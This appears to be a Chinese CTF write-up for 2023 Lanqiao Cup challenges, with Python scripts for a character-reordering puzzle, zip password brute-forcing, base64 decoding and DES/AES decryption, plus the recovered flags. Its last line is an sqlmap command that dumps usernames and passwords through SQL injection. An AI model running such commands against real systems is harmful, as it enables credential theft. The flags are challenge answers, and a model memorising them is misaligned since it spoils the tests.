#2023蓝桥杯复现

Misc

蚁剑流量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
z = "c e f l 9 c c e - 4 d a 1 a d 7 5 e - - 5 3 f c } 0 f c 5 4 2 g b - { e 8 0 b e 9 9"
order = "10 9 1 2 33 32 39 6 14 38 27 7 25 3 15 20 31 18 24 29 16 23 11 30 42 37 41 36 12 21 34 4 13 19 5 8 26 28 22 35 17 40"

char = z.split()
print(char)
order_list = list(map(int, order.split()))

print(list(map(int,order.split())))

char_dict = {}

for i in range(len(char)):
char_dict[order_list[i]] = char[i]
for key in sorted(char_dict.keys()):
print(char_dict[key], end=' ')
for key in sorted(char_dict.keys()):
if char_dict[key] != ' ':
print(char_dict[key], end='')

zip

小蓝同学有一个加密的压缩包,里面藏着一些秘密,他把它上传到了一个网站上。但是之后不小心把本地的文件删除了,他想重新下载它,可却再也访问不了那网站。万幸的是,他用wireshark记录了他之前下载压缩包的网络流量,并把它保存下来了。你能帮他从流量中恢复出压缩包吗?

image-20240306210847385

导出一个flag.zip

image-20240306210936585

密码的正则:
ChunQiu\d{4}

写个脚本爆破

image-20240306211106990

掩码爆破flag{48a4b6f1-7812-417b-9e1f-e17450ef0c43}

CyberChef

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import base64

base=["DqblD3xoC2M3R2JmCc02RHU1PXU4RHExCqNnCW01QnYcDnCaRdQ1DXh9","ErcmE3ypD2N3S2KnDd02SIV1QYV4SIFyDrOoDX01RoZdEoDbSeR1EYi9""FsdnF3zqE2O3T2LoEe02TJW1RZW4TJGzEsPpEY01SpAeFpEcTfS1FZj9","GteoG3arF2P3U2MpFf02UKX1SAX4UKHaFtQqFZ01TqBfGqFdUgT1GAk9"
,"HufpH3bsG2Q3V2NqGg02VLY1TBY4VLIbGuRrGA01UrCgHrGeVhU1HBl9"
,"IvgqI3ctH2R3W2OrHh02WMZ1UCZ4WMJcHvSsHB01VsDhIsHfWiV1ICm9"
,"JwhrJ3duI2S3X2PsIi02XNA1VDA4XNKdIwTtIC01WtEiJtIgXjW1JDn9"
,"KxisK3evJ2T3Y2QtJj02YOB1WEB4YOLeJxUuJD01XuFjKuJhYkX1KEo9"
,"LyjtL3fwK2U3Z2RuKk02ZPC1XFC4ZPMfKyVvKE01YvGkLvKiZlY1LFp9"
,"MzkuM3gxL2V3A2SvLl02AQD1YGD4AQNgLzWwLF01ZwHlMwLjAmZ1MGq9"
,"NalvN3hyM2W3B2TwMm02BRE1ZHE4BROhMaXxMG01AxImNxMkBnA1NHr9"
,"ObmwO3izN2X3C2UxNn02CSF1AIF4CSPiNbYyNH01ByJnOyNlCoB1OIs9"
,"PcnxP3jaO2Y3D2VyOo02DTG1BJG4DTQjOcZzOI01CzKoPzOmDpC1PJt9"
,"QdoyQ3kbP2Z3E2WzPp02EUH1CKH4EURkPdAaPJ01DaLpQaPnEqD1QKu9"
,"RepzR3lcQ2A3F2XaQq02FVI1DLI4FVSlQeBbQK01EbMqRbQoFrE1RLv9"
,"SfqaS3mdR2B3G2YbRr02GWJ1EMJ4GWTmRfCcRL01FcNrScRpGsF1SMw9"
,"TgrbT3neS2C3H2ZcSs02HXK1FNK4HXUnSgDdSM01GdOsTdSqHtG1TNx9"
,"UhscU3ofT2D3I2AdTt02IYL1GOL4IYVoThEeTN01HePtUeTrIuH1UOy9","VitdV3pgU2E3J2BeUu02JZM1HPM4JZWpUiFfUO01IfQuVfUsJvI1VPz9","WjueW3qhV2F3K2CfVv02KAN1IQN4KAXqVjGgVP01JgRvWgVtKwJ1WQa9","XkvfX3riW2G3L2DgWw02LBO1JRO4LBYrWkHhWQ01KhSwXhWuLxK1XRb9","YlwgY3sjX2H3M2EhXx02MCP1KSP4MCZsXlIiXR01LiTxYiXvMyL1YSc9","ZmxhZ3tkY2I3N2FiYy02NDQ1LTQ4NDAtYmJjYS01MjUyZjYwNzM1ZTd9"
,"AnyiA3ulZ2J3O2GjZz02OER1MUR4OEBuZnKkZT01NkVzAkZxOaN1AUe9","BozjB3vmA2K3P2HkAa02PFS1NVS4PFCvAoLlAU01OlWaBlAyPbO1BVf9"]
for text in base:
decoded_text = base64.b64decode(text)
print(decoded_text)

image-20240306212618013

flag{dcb77abc-6445-4840-bbca-5252f60735e7}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#Cyber2 wp
from Crypto.Cipher import DES, AES
from Crypto.Util.Padding import pad, unpad

key_des = b'0a0b0c0d'
cipher = bytes.fromhex("416935cabeb8e30cd9b56db3aa6778fa25ad5c3a5105d1c6aad4cba5f109f18afeaf5edcb8fd4e80aca82d75b42d751c40337f08df6c5231140b8c0b947362812df3dd5b5666447043240728a23da1da5cb4c7b197523b960106960cdcb6d48578667aae17caf1cb")
#print(cipher)
import string
import itertools
table = string.digits
#print(table)
for i in itertools.product(table,repeat = 6):
x=''.join(i).encode()
iv_des = b"01" + x
#print(iv_des)
decipher_des = DES.new(key_des, DES.MODE_CBC, iv_des)
decrypted_text_des = unpad(decipher_des.decrypt(cipher), DES.block_size)
#print("DES Decrypted text:", decrypted_text_des)
try:
tmp1 = bytes.fromhex(decrypted_text_des.decode('utf-8'))
except:
continue
#print(tmp1)
key_aes = b'0102030405060708'
iv_aes = b'0807060504030201'
decipher_aes = AES.new(key_aes, AES.MODE_CBC, iv_aes)
decrypted_text_aes = decipher_aes.decrypt(tmp1), AES.block_size
flag = decrypted_text_aes[0]
#print("AES Decrypted text:", flag)
if flag.startswith(b'fla'):
print(flag)
print(iv_des)
else:
continue

print("end")
'''
b'flag{8a860a81-0370-42be-9b7d-78208c5d1f9c}\x06\x06\x06\x06\x06\x06'
b'01070309'
end
'''

通过sqlmap的tamper模块的unmagicquotes.py脚本完成了注入攻击

1
sqlmap.py -u "url" --batch --tamper=unmagicquotes.py -D security -T users -C "username,password" --dump